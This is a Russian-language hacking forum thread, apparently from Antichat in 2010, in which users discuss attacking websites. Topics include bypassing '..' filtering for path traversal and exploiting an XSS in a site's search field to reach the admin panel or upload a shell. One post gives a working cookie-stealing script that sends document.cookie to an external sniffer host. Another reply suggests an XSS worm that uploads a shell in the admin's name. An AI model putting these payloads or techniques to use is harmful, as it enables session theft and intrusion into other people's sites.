 |
|
04.01.2010, 23:37
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
С нами:
10106889
Репутация:
0
|
|
Сообщение от Strilo4ka
а mysqli розширение не??? я не увверен но просто когда то что то читал в книге кажеться библия пользователя пхп мускуль ...
Ну вообще есть такие запросы, но при непосредственной работе с базой.
Насколько я знаю из php такое нельзя выполнить.
|
|
|
05.01.2010, 00:10
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
С нами:
10106889
Репутация:
0
|
|
Сообщение от Strilo4ka
почитай о mysqli тут тока его редко используют а используют тогда если много запросов тупят роботу, то переписуют одним используя multi_query. Да, действительно. Но нам это к сожалению врядли поможет 
|
|
|
|
05.01.2010, 00:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
|
|
|
|
05.01.2010, 00:18
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от mailbrush
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
сомневаюсь в возможности
|
|
|
|
05.01.2010, 00:38
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от mailbrush
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
Обрезается только ".." или "." тоже?
|
|
|
|
05.01.2010, 02:52
|
|
Новичок
Регистрация: 21.01.2009
Сообщений: 6
С нами:
9107642
Репутация:
0
|
|
Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
<script > alert("XSS") < /script>
Немного помудрив смог выполнить на нем хтмл код
<img src=http://a3.bing.com/reference/assets/orig/128px/Noscriptlogo.png>
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?
Последний раз редактировалось Raul Duke; 05.01.2010 в 02:54..
|
|
|
|
05.01.2010, 02:55
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от Raul Duke
Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
Немного помудрив смог выполнить на нем хтмл код
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд.
Если зальешь шелл через XSS - выложи видео, лол ок.
*не надо мне тут говорить пров аши особые условия 
Только куки
*скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.
|
|
|
|
05.01.2010, 03:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Strilo4ka
Не только куки еще код скриптов можно смотреть, кузя писал!!!
дай ссылку плиз на это чудо
|
|
|
|
05.01.2010, 06:10
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз
|
|
|
|
05.01.2010, 06:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
